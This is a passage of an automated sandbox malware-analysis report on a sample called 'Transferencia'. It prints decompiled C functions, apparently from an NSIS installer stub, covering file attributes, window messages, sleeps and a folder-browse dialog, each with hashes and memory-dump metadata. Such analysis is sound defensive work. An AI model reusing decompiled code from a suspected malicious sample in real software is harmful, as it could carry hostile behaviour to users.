                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction ID: 951ca2c494bd41099ddae5d9c01dd02c2d656467939f39d3ba1b92e1fa2b8fa2
                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction Fuzzy Hash: 68D0123200020DBBDF115F919D11FAB371DAB08310F014426FE06E40A1D775D530AB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004015A3() {
                                                				int _t5;
                                                				void* _t11;
                                                				int _t14;
                                                
                                                				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                				_t14 = _t5;
                                                				if(_t14 == 0) {
                                                					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t11 - 4));
                                                				return 0;
                                                			}






                                                0x004015ae
                                                0x004015b4
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 8e8437053afad80912e7fe99d23a7899dcdd75370ab461d6a983f2abced3a503
                                                • Instruction ID: 3401d83366b66bc7d36fe448f6674e23f614db8d4b192a7867871455da4782ce
                                                • Opcode Fuzzy Hash: 8e8437053afad80912e7fe99d23a7899dcdd75370ab461d6a983f2abced3a503
                                                • Instruction Fuzzy Hash: 5CD01772A08110DBDB11DBA8AA48B9E72A4AB51368B208937D111F61D0EAB8C9559B1A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044C2(int _a4) {
                                                				struct HWND__* _t2;
                                                				long _t3;
                                                
                                                				_t2 =  *0x7a7a38;
                                                				if(_t2 != 0) {
                                                					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                					return _t3;
                                                				}
                                                				return _t2;
                                                			}





                                                0x004044c2
                                                0x004044c9
                                                0x004044d4
                                                0x00000000
                                                0x004044d4
                                                0x004044da

                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                • Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
                                                • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                • Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004034C2(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}




                                                0x004034d0
                                                0x004034d6

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044AB(int _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SendMessageW( *0x7a8a68, 0x28, _a4, 1); // executed
                                                				return _t2;
                                                			}




                                                0x004044b9
                                                0x004044bf

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                                • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404498(int _a4) {
                                                				int _t2;
                                                
                                                				_t2 = EnableWindow( *0x7a1f44, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x004044a2
                                                0x004044a8

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                                • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004014D7(intOrPtr __edx) {
                                                				long _t3;
                                                				void* _t7;
                                                				intOrPtr _t10;
                                                				void* _t13;
                                                
                                                				_t10 = __edx;
                                                				_t3 = E00402D84(_t7);
                                                				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                				if(_t3 <= 1) {
                                                					_t3 = 1;
                                                				}
                                                				Sleep(_t3); // executed
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t13 - 4));
                                                				return 0;
                                                			}







                                                0x004014d7
                                                0x004014d8
                                                0x004014e1
                                                0x004014e4
                                                0x004014e8
                                                0x004014e8
                                                0x004014ea
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                                                • Instruction ID: 3b5dc4dfeaf44569f9deb2ecf0de9c371932af0cf72a0f4646a25a2108455337
                                                • Opcode Fuzzy Hash: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                                                • Instruction Fuzzy Hash: E0D05E73A141018BD704EBB8BE8545E73A8EB503193208C37D402E1091EA7888564618
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E732A12BB() {
                                                				void* _t3;
                                                
                                                				_t3 = GlobalAlloc(0x40,  *0x732a506c +  *0x732a506c); // executed
                                                				return _t3;
                                                			}




                                                0x732a12c5
                                                0x732a12cb

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,732A12DB,?,732A137F,00000019,732A11CA,-000000A0), ref: 732A12C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 2b18cc81a81b5258c4344524256d7ff3a1d65c7c6754030c3aa7141ce041a8e8
                                                • Instruction ID: 318a296f81240e7a8cd7bf5d7aba96274e3b4693a0c0c3b8272cda7a3b5dec79
                                                • Opcode Fuzzy Hash: 2b18cc81a81b5258c4344524256d7ff3a1d65c7c6754030c3aa7141ce041a8e8
                                                • Instruction Fuzzy Hash: F7B012B2A00010DFEE00AB65CC0EF353294E704301F25C000FF08C0281C1608800B534
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00404967(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				WCHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				WCHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				short* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				WCHAR* _t146;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed int* _t160;
                                                				struct HWND__* _t166;
                                                				struct HWND__* _t167;
                                                				int _t169;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x7a0f20; // 0x9a9554
                                                				_v32 = _t82;
                                                				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E00405B5E(0x3fb, _t146);
                                                					E004067A1(_t146);
                                                				}
                                                				_t167 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E00405B5E(0x3fb, _t146);
                                                							if(E00405EF1(_t186, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E0040651A(0x79ff18, _t146);
                                                							_t87 = E004068E7(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E0040651A(0x79ff18, _t146);
                                                								_t89 = E00405E94(0x79ff18);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 = 0;
                                                								}
                                                								if(GetDiskFreeSpaceW(0x79ff18,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t169 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x79ff18) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x79ff18,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405E35(0x79ff18);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x79ff18) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t169 = 0x400;
                                                								L36:
                                                								_t95 = E00404E04(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != _t158) {
                                                									E00404DEC(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextW(_a4, _t169, 0x79ff08);
                                                									} else {
                                                										E00404D23(_t169, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x7a8b04 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E00404498(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x7a1f38 == _t158) {
                                                									E004048C0();
                                                								}
                                                								 *0x7a1f38 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t186 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t167;
                                                							_v72 = 0x7a1f48;
                                                							_v60 = E00404CBD;
                                                							_v56 = _t146;
                                                							_v68 = E00406557(_t146, 0x7a1f48, _t167, 0x7a0720, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderW(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E00405DE9(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x7a8a70 + 0x11c));
                                                								if( *((intOrPtr*)( *0x7a8a70 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                									E00406557(_t146, 0x7a1f48, _t167, 0, _t125);
                                                									if(lstrcmpiW(0x7a6a00, 0x7a1f48) != 0) {
                                                										lstrcatW(_t146, 0x7a6a00);
                                                									}
                                                								}
                                                								 *0x7a1f38 =  *0x7a1f38 + 1;
                                                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t166 = GetDlgItem(_t167, 0x3fb);
                                                					if(E00405E60(_t146) != 0 && E00405E94(_t146) == 0) {
                                                						E00405DE9(_t146);
                                                					}
                                                					 *0x7a7a38 = _t167;
                                                					SetWindowTextW(_t166, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00404476(_t167);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00404476(_t167);
                                                					E004044AB(_t166);
                                                					_t138 = E004068E7(8);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E004044DD(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t166, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}













































                                                0x00404967
                                                0x0040496d
                                                0x00404973
                                                0x00404980
                                                0x0040498e
                                                0x00404991
                                                0x00404999
                                                0x0040499f
                                                0x0040499f
                                                0x004049ab
                                                0x004049ae
                                                0x00404a1c
                                                0x00404a23
                                                0x00404afa
                                                0x00404b01
                                                0x00404b10
                                                0x00404b10
                                                0x00404b14
                                                0x00404b1e
                                                0x00404b2b
                                                0x00404b2d
                                                0x00404b2d
                                                0x00404b3b
                                                0x00404b42
                                                0x00404b49
                                                0x00404b4c
                                                0x00404b88
                                                0x00404b8a
                                                0x00404b90
                                                0x00404b95
                                                0x00404b99
                                                0x00404b9b
                                                0x00404b9b
                                                0x00404bb7
                                                0x00000000
                                                0x00404bb9
                                                0x00404bbc
                                                0x00404bca
                                                0x00404bd0
                                                0x00404bd1
                                                0x00404bd4
                                                0x00404bd7
                                                0x00000000
                                                0x00404bd7
                                                0x00404b4e
                                                0x00404b50
                                                0x00404b54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b56
                                                0x00404b56
                                                0x00404b63
                                                0x00404b68
                                                0x00000000
                                                0x00000000
                                                0x00404b6c
                                                0x00404b6e
                                                0x00404b6e
                                                0x00404b77
                                                0x00404b79
                                                0x00404b7e
                                                0x00404b81
                                                0x00404b86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b86
                                                0x00404be3
                                                0x00404bed
                                                0x00404bf0
                                                0x00404bf3
                                                0x00404bfa
                                                0x00404bfa
                                                0x00404bfc
                                                0x00404bfc
                                                0x00404c01
                                                0x00404c03
                                                0x00404c0b
                                                0x00404c12
                                                0x00404c14
                                                0x00404c1f
                                                0x00404c1f
                                                0x00404c14
                                                0x00404c2f
                                                0x00404c39
                                                0x00404c41
                                                0x00404c5c
                                                0x00404c43
                                                0x00404c4c
                                                0x00404c4c
                                                0x00404c41
                                                0x00404c61
                                                0x00404c66
                                                0x00404c6b
                                                0x00404c74
                                                0x00404c74
                                                0x00404c7d
                                                0x00404c7f
                                                0x00404c7f
                                                0x00404c8b
                                                0x00404c93
                                                0x00404c9d
                                                0x00404c9d
                                                0x00404ca2
                                                0x00000000
                                                0x00404ca2
                                                0x00404b4c
                                                0x00404b03
                                                0x00404b0a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b0a
                                                0x00404a29
                                                0x00404a32
                                                0x00404a4c
                                                0x00404a51
                                                0x00404a5b
                                                0x00404a62
                                                0x00404a6e
                                                0x00404a71
                                                0x00404a74
                                                0x00404a7b
                                                0x00404a83
                                                0x00404a86
                                                0x00404a8a
                                                0x00404a91
                                                0x00404a99
                                                0x00404af3
                                                0x00404a9b
                                                0x00404a9c
                                                0x00404aa3
                                                0x00404aad
                                                0x00404ab5
                                                0x00404ac2
                                                0x00404ad6
                                                0x00404ada
                                                0x00404ada
                                                0x00404ad6
                                                0x00404adf
                                                0x00404aec
                                                0x00404aec
                                                0x00404a99
                                                0x00000000
                                                0x00404a51
                                                0x00404a3f
                                                0x00000000
                                                0x00000000
                                                0x00404a45
                                                0x00000000
                                                0x004049b0
                                                0x004049bd
                                                0x004049c6
                                                0x004049d3
                                                0x004049d3
                                                0x004049da
                                                0x004049e0
                                                0x004049e9
                                                0x004049ec
                                                0x004049ef
